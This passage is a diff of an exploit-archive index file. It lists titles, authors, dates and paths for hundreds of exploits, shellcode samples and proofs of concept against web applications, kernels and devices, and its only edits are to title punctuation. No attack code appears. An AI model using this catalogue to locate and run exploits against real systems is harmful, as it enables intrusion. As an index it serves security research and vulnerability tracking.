36198,platforms/multiple/dos/36198.pl,"Polipo 1.0.4.1 POST/PUT Requests HTTP Header Processing Denial Of Service",2011-10-01,"Usman Saeed",multiple,dos,0 @@ -32647,11 +32647,11 @@ id,file,description,date,author,platform,type,port 36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 restore.php Post Authentication Command Injection",2015-03-04,Metasploit,linux,remote,443 36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service",2011-04-11,"Luigi Auriemma",windows,dos,0 36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'xml/get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0 -36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0 -36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Parameter Cross Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0 +36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0 +36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Parameter Cross-Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0 36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,"cr4wl3r ",php,webapps,0 36215,platforms/php/webapps/36215.txt,"Joomla! 'com_expedition' Component 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0 -36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0 +36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0 36217,platforms/windows/remote/36217.txt,"GoAhead Webserver 2.18 addgroup.asp group Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0 36218,platforms/windows/remote/36218.txt,"GoAhead Webserver 2.18 addlimit.asp url Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0 36219,platforms/windows/remote/36219.txt,"GoAhead Webserver 2.18 adduser.asp Multiple Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0 @@ -32659,39 +32659,39 @@ id,file,description,date,author,platform,type,port 36221,platforms/php/webapps/36221.txt,"Joomla! 'com_br' Component 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 36222,platforms/php/webapps/36222.txt,"Joomla! 'com_shop' Component 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusion",2011-10-11,indoushka,php,webapps,0 -36224,platforms/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 - Cross Site Scripting / Information Disclosure",2011-10-10,"labs insight",php,webapps,0 +36224,platforms/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 - Cross-Site Scripting / Information Disclosure",2011-10-10,"labs insight",php,webapps,0 36225,platforms/php/webapps/36225.txt,"Contao CMS 2.10.1 Cross-Site Scripting",2011-10-02,"Stefan Schurtz",php,webapps,0 -36226,platforms/php/webapps/36226.txt,"SilverStripe 2.4.5 Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0 +36226,platforms/php/webapps/36226.txt,"SilverStripe 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0 36227,platforms/php/webapps/36227.txt,"Joomla! Sgicatalog Component 1.0 - 'id' Parameter SQL Injection",2011-10-12,"BHG Security Center",php,webapps,0 -36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 Multiple Cross Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0 +36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0 36229,platforms/linux/local/36229.py,"VFU 4.10-1.1 - Move Entry Buffer Overflow",2015-02-25,"Bas van den Berg",linux,local,0 36230,platforms/php/webapps/36230.txt,"Calculated Fields Form WordPress Plugin 1.0.10 - SQL Injection",2015-03-02,"Ibrahim Raafat",php,webapps,0 36231,platforms/php/webapps/36231.py,"GoAutoDial CE 2.0 - Shell Upload",2015-02-28,R-73eN,php,webapps,0 36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,php,webapps,80 -36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 - Multiple Cross Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0 +36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0 36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 Buffer Overflow and Denial of Service",2011-10-13,"Fredrik Widlund",multiple,dos,0 -36235,platforms/windows/remote/36235.txt,"PROMOTIC 8.1.3 Multiple Security Vulnerabilities",2011-10-14,"Luigi Auriemma",windows,remote,0 -36236,platforms/php/webapps/36236.txt,"Xenon 'id' Parameter Multiple SQL Injection",2011-10-14,m3rciL3Ss,php,webapps,0 -36237,platforms/php/webapps/36237.txt,"asgbookphp 1.9 - 'index.php' Cross Site Scripting",2011-10-17,indoushka,php,webapps,0 +36235,platforms/windows/remote/36235.txt,"PROMOTIC 8.1.3 - Multiple Security Vulnerabilities",2011-10-14,"Luigi Auriemma",windows,remote,0 +36236,platforms/php/webapps/36236.txt,"Xenon - 'id' Parameter Multiple SQL Injection",2011-10-14,m3rciL3Ss,php,webapps,0 +36237,platforms/php/webapps/36237.txt,"asgbookphp 1.9 - 'index.php' Cross-Site Scripting",2011-10-17,indoushka,php,webapps,0 36238,platforms/multiple/remote/36238.txt,"Multiple Toshiba e-Studio Devices Security Bypass",2011-10-17,"Deral Heiland PercX",multiple,remote,0 -36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0 -36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 - 'index.php' Cross Site Scripting and SQL Injection",2011-10-18,"Stefan Schurtz",php,webapps,0 +36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 - Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0 +36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 - 'index.php' Cross-Site Scripting / SQL Injection",2011-10-18,"Stefan Schurtz",php,webapps,0 36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - LFI",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0 -36242,platforms/php/webapps/36242.txt,"WordPress Theme Photocrati 4.x.x - SQL Injection & XSS",2015-03-03,ayastar,php,webapps,0 +36242,platforms/php/webapps/36242.txt,"WordPress Theme Photocrati 4.x.x - SQL Injection / XSS",2015-03-03,ayastar,php,webapps,0 36243,platforms/php/webapps/36243.txt,"WordPress cp-multi-view-calendar 1.1.4 - SQL Injection",2015-03-03,"i0akiN SEC-LABORATORY",php,webapps,0 -36246,platforms/multiple/remote/36246.txt,"Splunk 4.1.6 'segment' Parameter Cross Site Scripting",2011-10-20,"Filip Palian",multiple,remote,0 +36246,platforms/multiple/remote/36246.txt,"Splunk 4.1.6 'segment' Parameter Cross-Site Scripting",2011-10-20,"Filip Palian",multiple,remote,0 36247,platforms/multiple/dos/36247.txt,"Splunk 4.1.6 Web component Remote Denial of Service",2011-10-20,"Filip Palian",multiple,dos,0 -36248,platforms/php/webapps/36248.txt,"osCommerce - Remote File Upload and File Disclosure",2011-10-20,indoushka,php,webapps,0 -36249,platforms/php/webapps/36249.txt,"Tine 2.0 Multiple Cross Site Scripting Vulnerabilities",2011-10-20,"High-Tech Bridge SA",php,webapps,0 +36248,platforms/php/webapps/36248.txt,"osCommerce - Remote File Upload / File Disclosure",2011-10-20,indoushka,php,webapps,0 +36249,platforms/php/webapps/36249.txt,"Tine 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-20,"High-Tech Bridge SA",php,webapps,0 36250,platforms/windows/remote/36250.html,"Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method",2011-10-24,rgod,windows,remote,0 36251,platforms/php/webapps/36251.txt,"PHPMoAdmin Unauthorized Remote Code Execution (0-Day)",2015-03-03,@u0x,php,webapps,80 36252,platforms/php/webapps/36252.txt,"e107 0.7.24 - 'cmd' Parameter Remote Command Execution",2011-10-24,"Matt Bergin",php,webapps,0 -36253,platforms/php/webapps/36253.txt,"InverseFlow 2.4 Multiple Cross Site Scripting Vulnerabilities",2011-10-24,"Amir Expl0its",php,webapps,0 -36254,platforms/php/webapps/36254.txt,"Alsbtain Bulletin 1.5/1.6 Multiple Local File Inclusion",2011-10-25,"Null H4ck3r",php,webapps,0 -36255,platforms/php/webapps/36255.txt,"vtiger CRM 5.2.1 - 'index.php' Multiple Cross Site Scripting Vulnerabilities",2011-10-26,LiquidWorm,php,webapps,0 +36253,platforms/php/webapps/36253.txt,"InverseFlow 2.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-24,"Amir Expl0its",php,webapps,0 +36254,platforms/php/webapps/36254.txt,"Alsbtain Bulletin 1.5/1.6 - Multiple Local File Inclusion",2011-10-25,"Null H4ck3r",php,webapps,0 +36255,platforms/php/webapps/36255.txt,"vtiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-10-26,LiquidWorm,php,webapps,0 36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products 'file' Parameter Directory Traversal",2011-10-26,"Sandro Gauci",hardware,remote,0 36257,platforms/linux/local/36257.txt,"Trendmicro IWSS 3.1 - Local Privilege Escalation",2011-10-26,"Buguroo Offensive Security",linux,local,0 -36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 Multiple Cross Site Scripting Vulnerabilities",2011-10-26,Sangteamtham,windows,remote,0 +36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-26,Sangteamtham,windows,remote,0 36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 - 'professor.php' Script Multiple SQL Injection",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0 36260,platforms/windows/dos/36260.txt,"Opera Web Browser 11.52 Escape Sequence Stack Buffer Overflow Denial of Service",2011-10-28,"Marcel Bernhardt",windows,dos,0 36264,platforms/php/remote/36264.rb,"Seagate Business NAS Unauthenticated Remote Command Execution",2015-03-04,Metasploit,php,remote,80 @@ -32700,42 +32700,42 @@ id,file,description,date,author,platform,type,port 36267,platforms/linux/dos/36267.c,"Linux Kernel 3.15.6 - PPP-over-L2TP Socket Level Handling Crash PoC",2015-03-04,"Emeric Nasi",linux,dos,0 36268,platforms/linux/dos/36268.c,"Linux Kernel 3.16.3 - Associative Array Garbage Collection Crash PoC",2015-03-04,"Emeric Nasi",linux,dos,0 36269,platforms/php/webapps/36269.txt,"SjXjV 2.3 - 'post.php' SQL Injection",2011-10-28,"599eme Man",php,webapps,0 -36270,platforms/php/webapps/36270.txt,"Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross Site Scripting",2011-10-28,"599eme Man",php,webapps,0 +36270,platforms/php/webapps/36270.txt,"Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross-Site Scripting",2011-10-28,"599eme Man",php,webapps,0 36271,platforms/osx/dos/36271.py,"Apple Mac OS X 10.6.5 And iOS 4.3.3 Mail Denial of Service",2011-10-29,shebang42,osx,dos,0 -36272,platforms/php/webapps/36272.txt,"Domain Shop 'index.php' Cross Site Scripting",2011-11-01,Mr.PaPaRoSSe,php,webapps,0 -36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 Multiple Remote File Inclusion",2011-11-01,indoushka,php,webapps,0 +36272,platforms/php/webapps/36272.txt,"Domain Shop 'index.php' Cross-Site Scripting",2011-11-01,Mr.PaPaRoSSe,php,webapps,0 +36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 - Multiple Remote File Inclusion",2011-11-01,indoushka,php,webapps,0 36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS - (Little Endian) Chmod 666 /etc/shadow shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 -36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0 +36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 Cross-Site Scripting and Multiple Unspecified Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0 36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/passwd shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 -36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) 'str' Parameter Cross Site Scripting",2011-11-01,Isfahan,php,webapps,0 -36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 Multiple Cross Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0 -36282,platforms/php/webapps/36282.txt,"eFront 3.6.x Multiple Cross Site Scripting and SQL Injection",2011-11-02,"High-Tech Bridge SA",php,webapps,0 -36283,platforms/php/webapps/36283.txt,"Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross Site Scripting",2011-11-03,"Stefan Schurtz",php,webapps,0 +36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) 'str' Parameter Cross-Site Scripting",2011-11-01,Isfahan,php,webapps,0 +36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0 +36282,platforms/php/webapps/36282.txt,"eFront 3.6.x Multiple Cross-Site Scripting and SQL Injection",2011-11-02,"High-Tech Bridge SA",php,webapps,0 +36283,platforms/php/webapps/36283.txt,"Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross-Site Scripting",2011-11-03,"Stefan Schurtz",php,webapps,0 36280,platforms/php/webapps/36280.txt,"Symphony 2.2.3 symphony/publish/images filter Parameter XSS",2011-11-01,"Mesut Timur",php,webapps,0 36281,platforms/php/webapps/36281.txt,"Symphony 2.2.3 symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0 -36284,platforms/asp/webapps/36284.txt,"CmyDocument Multiple Cross Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps,0 +36284,platforms/asp/webapps/36284.txt,"CmyDocument Multiple Cross-Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps,0 36285,platforms/windows/dos/36285.c,"Microsoft Windows TCP/IP Stack Reference Counter Integer Overflow",2011-11-08,anonymous,windows,dos,0 36286,platforms/hardware/remote/36286.txt,"DreamBox DM800 - 'file' Parameter Local File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0 -36287,platforms/php/webapps/36287.txt,"WordPress Bonus Theme 1.0 - 's' Parameter Cross Site Scripting",2011-11-04,3spi0n,php,webapps,0 +36287,platforms/php/webapps/36287.txt,"WordPress Bonus Theme 1.0 - 's' Parameter Cross-Site Scripting",2011-11-04,3spi0n,php,webapps,0 36288,platforms/multiple/dos/36288.php,"Multiple Vendors libc 'regcomp()' Stack Exhaustion Denial Of Service",2011-11-04,"Maksymilian Arciemowicz",multiple,dos,0 -36289,platforms/php/webapps/36289.txt,"SmartJobBoard 'keywords' Parameter Cross Site Scripting",2011-11-07,Mr.PaPaRoSSe,php,webapps,0 +36289,platforms/php/webapps/36289.txt,"SmartJobBoard 'keywords' Parameter Cross-Site Scripting",2011-11-07,Mr.PaPaRoSSe,php,webapps,0 36290,platforms/php/webapps/36290.txt,"Admin Bot 'news.php' SQL Injection",2011-11-07,baltazar,php,webapps,0 -36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0 +36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross-Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0 36292,platforms/java/webapps/36292.txt,"Oracle NoSQL 11g 1.1.100 R2 - 'log' Parameter Directory Traversal",2011-11-07,Buherátor,java,webapps,0 36293,platforms/php/webapps/36293.txt,"Centreon 2.3.1 - 'command_name' Parameter Remote Command Execution",2011-11-04,"Christophe de la Fuente",php,webapps,0 36294,platforms/linux/local/36294.c,"Linux Kernel 3.0.4 - '/proc/interrupts' Password Length Local Information Disclosure Weakness",2011-11-07,"Vasiliy Kulikov",linux,local,0 36295,platforms/php/webapps/36295.txt,"PBCS Technology 'articlenav.php' SQL Injection",2011-11-08,Kalashinkov3,php,webapps,0 36296,platforms/bsd/local/36296.pl,"OpenPAM - 'pam_start()' Local Privilege Escalation",2011-11-09,IKCE,bsd,local,0 -36297,platforms/php/webapps/36297.txt,"AShop - Open-Redirection / Cross Site Scripting",2011-11-09,"Infoserve Security Team",php,webapps,0 -36298,platforms/php/webapps/36298.txt,"Joomla! 1.9.3 - 'com_alfcontact' Extension Multiple Cross Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0 -36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 Admin Login Page Multiple Cross Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0 +36297,platforms/php/webapps/36297.txt,"AShop - Open-Redirection / Cross-Site Scripting",2011-11-09,"Infoserve Security Team",php,webapps,0 +36298,platforms/php/webapps/36298.txt,"Joomla! 1.9.3 - 'com_alfcontact' Extension Multiple Cross-Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0 +36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0 36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow",2011-11-11,swami,windows,dos,0 36301,platforms/php/webapps/36301.txt,"WordPress Download Manager 2.7.2 - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0 36302,platforms/php/webapps/36302.txt,"Joomla Content Component 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0 36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",php,webapps,80 36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 Remote Command Execution",2015-03-06,Metasploit,windows,remote,5555 36305,platforms/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection",2015-03-07,"Ahmed Aboul-Ela",php,webapps,0 -36306,platforms/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass And SQL Injection",2015-03-06,ZeQ3uL,php,webapps,0 +36306,platforms/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass / SQL Injection",2015-03-06,ZeQ3uL,php,webapps,0 36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 admin_index.php SITE_NAME Parameter XSS",2011-11-13,"Gjoko Krstic",php,webapps,0 36308,platforms/php/webapps/36308.txt,"Webistry 1.6 'pid' Parameter SQL Injection",2011-11-16,CoBRa_21,php,webapps,0 36309,platforms/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash PoC",2015-03-08,"Loudiyi Mohamed",hardware,dos,0 @@ -32743,17 +32743,17 @@ id,file,description,date,author,platform,type,port 36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer: NaCl Sandbox Escape PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0 36314,platforms/php/webapps/36314.txt,"webERP 4.3.8 reportwriter/ReportMaker.php reportid Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 36315,platforms/php/webapps/36315.txt,"webERP 4.3.8 reportwriter/FormMaker.php ReportID Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 -36316,platforms/php/webapps/36316.txt,"ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 Cross Site Scripting",2011-11-17,"James webb",php,webapps,0 -36317,platforms/php/webapps/36317.txt,"WordPress Flexible Custom Post Type plugin - 'id' Parameter Cross Site Scripting",2011-11-17,Am!r,php,webapps,0 +36316,platforms/php/webapps/36316.txt,"ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 Cross-Site Scripting",2011-11-17,"James webb",php,webapps,0 +36317,platforms/php/webapps/36317.txt,"WordPress Flexible Custom Post Type plugin - 'id' Parameter Cross-Site Scripting",2011-11-17,Am!r,php,webapps,0 36318,platforms/windows/remote/36318.txt,"Jetty Web Server Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0 -36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0 +36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0 36320,platforms/php/webapps/36320.txt,"Codoforum 2.5.1 - Arbitrary File Download",2015-03-10,"Kacper Szurek",php,webapps,80 36321,platforms/php/webapps/36321.txt,"GeniXCMS 0.0.1 - Multiple Vulnerabilities",2015-03-10,LiquidWorm,php,webapps,80 36322,platforms/php/webapps/36322.txt,"Digital Attic Foundation CMS 'id' Parameter SQL Injection",2011-11-20,tempe_mendoan,php,webapps,0 -36323,platforms/php/webapps/36323.txt,"WordPress Alert Before Your Post Plugin - 'name' Parameter Cross Site Scripting",2011-11-21,Am!r,php,webapps,0 -36324,platforms/php/webapps/36324.txt,"WordPress Advanced Text Widget Plugin 2.0 - 'page' Parameter Cross Site Scripting",2011-11-21,Amir,php,webapps,0 -36325,platforms/php/webapps/36325.txt,"WordPress Adminimize Plugin 1.7.21 - 'page' Parameter Cross Site Scripting",2011-11-21,Am!r,php,webapps,0 -36326,platforms/php/webapps/36326.txt,"WordPress Lanoba Social Plugin 1.0 - 'action' Parameter Cross Site Scripting",2011-11-21,Amir,php,webapps,0 +36323,platforms/php/webapps/36323.txt,"WordPress Alert Before Your Post Plugin - 'name' Parameter Cross-Site Scripting",2011-11-21,Am!r,php,webapps,0 +36324,platforms/php/webapps/36324.txt,"WordPress Advanced Text Widget Plugin 2.0 - 'page' Parameter Cross-Site Scripting",2011-11-21,Amir,php,webapps,0 +36325,platforms/php/webapps/36325.txt,"WordPress Adminimize Plugin 1.7.21 - 'page' Parameter Cross-Site Scripting",2011-11-21,Am!r,php,webapps,0 +36326,platforms/php/webapps/36326.txt,"WordPress Lanoba Social Plugin 1.0 - 'action' Parameter Cross-Site Scripting",2011-11-21,Amir,php,webapps,0 36327,platforms/windows/local/36327.txt,"Microsoft Windows XP/7 Kernel - 'Win32k.sys' Keyboard Layout Local Privilege Escalation",2011-11-22,instruder,windows,local,0 36328,platforms/php/webapps/36328.txt,"TA.CMS (TeachArabia) index.php id Parameter SQL Injection",2011-11-22,CoBRa_21,php,webapps,0 36329,platforms/php/webapps/36329.txt,"TA.CMS (TeachArabia) lang Parameter Traversal Local File Inclusion",2011-11-22,CoBRa_21,php,webapps,0 @@ -32765,17 +32765,17 @@ id,file,description,date,author,platform,type,port 36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0 36336,platforms/windows/dos/36336.txt,"Microsoft Windows Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0 36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200 -36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross Site Scripting",2011-11-23,Amir,php,webapps,0 -36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 - 'snum' Parameter Cross Site Scripting",2011-11-23,Amir,php,webapps,0 -36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 - 'idnews' Parameter Cross Site Scripting",2011-11-23,Amir,php,webapps,0 +36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 +36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 - 'snum' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 +36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 - 'idnews' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0 40008,platforms/php/webapps/40008.txt,"Getsimple CMS 3.3.10 - Arbitrary File Upload",2016-06-23,s0nk3y,php,webapps,80 36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/googlemap.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0 36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 - /modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition Parameter XSS",2011-11-23,Prestashop,php,webapps,0 36344,platforms/php/webapps/36344.txt,"PrestaShop 1.4.4.1 - /admin/ajaxfilemanager/ajax_save_text.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0 36345,platforms/php/webapps/36345.txt,"Prestashop 1.4.4.1 - 'displayImage.php' HTTP Response Splitting",2011-11-23,RGouveia,php,webapps,0 -36346,platforms/php/webapps/36346.txt,"Zen Cart CMS 1.3.9h Multiple Cross Site Scripting Vulnerabilities",2011-11-23,RPinto,php,webapps,0 -36347,platforms/php/webapps/36347.txt,"Hastymail2 - 'rs' Parameter Cross Site Scripting",2011-11-22,HTrovao,php,webapps,0 +36346,platforms/php/webapps/36346.txt,"Zen Cart CMS 1.3.9h Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,RPinto,php,webapps,0 +36347,platforms/php/webapps/36347.txt,"Hastymail2 - 'rs' Parameter Cross-Site Scripting",2011-11-22,HTrovao,php,webapps,0 36348,platforms/php/webapps/36348.txt,"Pro Clan Manager 0.4.2 SQL Injection",2011-11-23,anonymous,php,webapps,0 36349,platforms/php/webapps/36349.txt,"AdaptCMS 2.0 SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 36350,platforms/php/webapps/36350.txt,"Balitbang CMS 3.3 index.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 @@ -32790,8 +32790,8 @@ id,file,description,date,author,platform,type,port 36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0 36360,platforms/windows/remote/36360.rb,"Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free",2015-03-12,Metasploit,windows,remote,0 36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Command Remote Denial Of Service",2011-11-25,"Houssam Sahli",windows,dos,0 -36362,platforms/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 Multiple Cross Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps,0 -36363,platforms/php/webapps/36363.txt,"WordPress Skysa App Bar Plugin 'idnews' Parameter Cross Site Scripting",2011-11-28,Amir,php,webapps,0 +36362,platforms/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps,0 +36363,platforms/php/webapps/36363.txt,"WordPress Skysa App Bar Plugin 'idnews' Parameter Cross-Site Scripting",2011-11-28,Amir,php,webapps,0 36364,platforms/php/webapps/36364.txt,"Manx 1.0.1 admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0 36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0 36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 - /admin/admin_blocks.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 @@ -32810,8 +32810,8 @@ id,file,description,date,author,platform,type,port 36379,platforms/php/webapps/36379.txt,"OrangeHRM 2.6.11 index.php Multiple Parameter XSS",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36380,platforms/php/webapps/36380.txt,"OrangeHRM 2.6.11 lib/controllers/CentralController.php URI XSS",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36381,platforms/php/webapps/36381.txt,"OrangeHRM 2.6.11 lib/controllers/CentralController.php id Parameter SQL 